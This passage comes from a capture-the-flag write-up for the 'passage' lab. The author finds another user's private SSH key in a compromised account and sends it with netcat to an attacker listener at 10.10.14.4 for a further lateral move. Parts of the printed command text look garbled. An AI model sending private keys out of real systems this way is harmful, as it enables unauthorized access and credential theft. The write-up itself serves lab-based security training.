SSH_Key
After making a lateral movement to the paul user from the existing session, I was trying to upgrade the shell to a SSH session by writing my own key to the SSH file of the paul user. Then I discovered something interesting
paul@passage:~/.ssh$ ll
total 24
drwxr-xr-x 2 paul paul 4096 Jul 21 2020 ./
drwxr-x--- 16 paul paul 4096 Feb 5 2021 ../
-rw-r--r-- 1 paul paul 395 Jul 21 2020 authorized_keys
-rw------- 1 paul paul 1679 Jul 21 2020 id_rsa
-rw-r--r-- 1 paul paul 395 Jul 21 2020 id_rsa.pub
-rw-r--r-- 1 paul paul 1312 Jul 21 2020 known_hostsThere already are existing SSH keys sitting here
paul@passage:~/.ssh$ cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzXiscFGV3l9T2gvXOkh9w+BpPnhFv5AOPagArgzWDk9uUq7/4v4kuzso/lAvQIg2gYaEHlDdpqd9gCYA7tg76N5RLbroGqA6Po91Q69PQadLsziJnYumbhClgPLGuBj06YKDktI3bo/H3jxYTXY3kfIUKo3WFnoVZiTmvKLDkAlO/+S2tYQa7wMleSR01pP4VExxPW4xDfbLnnp9zOUVBpdCMHl8lRdgogOQuEadRNRwCdIkmMEY5efV3YsYcwBwc6h/ZB4u8xPyH3yFlBNR7JADkn7ZFnrdvTh3OY+kLEr6FuiSyOEWhcPybkM5hxdL9ge9bWreSfNC1122qq49d nadav@passageChecking the authorized_keys file reveals that the SSH key pair belongs to the nadav user.
While I am unsure if this was a misconfiguration or intentional for quicker management, I can probably use this key to make another lateral movement to the nadav user
paul@passage:~/.ssh$ nc 10.10.14.4 2222 < nc 10.10.14.4 2222 < id_rsa
┌──(kali㉿kali)-[~/archive/htb/labs/passage]
└─$ nnc 2222 > id_rsa.nadav
listening on [any] 2222 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.206] 54874
┌──(kali㉿kali)-[~/archive/htb/labs/passage]
└─$ chmod 600 id_rsa.nadavI transferred the private SSH key that belongs to the nadav user using Netcat
I also set its permission bit to 600, so that SSH can read this file as a valid SSH private key
Now, I will test it out